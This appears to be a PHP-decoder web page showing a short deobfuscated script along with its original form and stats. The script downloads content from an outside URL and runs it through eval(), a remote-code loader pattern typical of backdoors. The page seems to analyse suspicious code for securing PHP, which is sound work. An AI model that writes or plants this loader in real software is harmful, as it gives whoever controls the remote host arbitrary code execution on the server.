Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $url = "http://ndot.us/za"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RET..
Decoded Output download
<?php
$url = "http://ndot.us/za";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval("?>".$result);
?>
Did this file decode correctly?
Original Code
<?php
$url = "http://ndot.us/za";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval("?>".$result);
?>
Function Calls
curl_init | 1 |
Stats
MD5 | 786a6077617cb97533e23133bc92b211 |
Eval Count | 0 |
Decode Time | 46 ms |